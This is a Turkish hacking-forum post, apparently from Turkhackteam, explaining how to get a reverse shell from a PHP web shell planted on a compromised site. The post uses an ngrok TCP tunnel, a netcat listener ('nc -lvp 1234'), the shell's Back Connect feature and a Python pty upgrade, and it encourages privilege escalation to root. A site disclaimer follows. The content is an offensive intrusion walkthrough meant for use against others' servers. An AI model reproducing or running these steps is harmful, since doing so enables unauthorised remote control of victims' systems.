Reverse shell

byvuitton

Yeni üye
14 Ocak 2021
8
11
İhtiyacımız olanlar ; Shell adresimiz

Şimdi shellimizde bulunan BC kısmına geliyoruz..

BC.png

Ardından terminalimize geliyoruz..

Ben sayfayı 2 ye bölüyorum ardından ngrok un olduğu dizine gelip ./ngrok tcp 1234 yazıyorum ardından 2. sayfama nc -lvp 1234 yazıyorum.

ngrok1.png

ngrok2.png

netcat.png

Ve sonrasında Ngrok un bize Forwarding kısmında verdiği linki tcp:// siz şekilde shellimizin PHP Back Connect İp kısmına yapışıtırıyoruz bende şu linki verdi ;

tcp://2.tcp.eu.ngrok.io:17040 benim yazmam gereken 2.tcp.eu.ngrok.io:17040 sonrasında portumuzu yazıyoruz yukarda ./ngrok 1234 diye portumuzu 1234 belirtmiştik yazıp enterlıyoruz ve bekliyoruz..

bc2.png

Evet terminalimize shellimiz geldi..

terminal.png

Eğer isterseniz /bin/bash shell halinde kullanmak isterseniz ; python -c 'import pty;pty.spawn("/bin/bash")' yazarak shelli daha kullanışlı hale getirebilirsiniz..

bin.png

Burdan yetki yükseltme işlemi yapıp root yetkisine ulaşabilirsiniz. Ben denedim fakat ulaşamadım.

Konum buraya kadardı umarım anlamışsınızdır.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.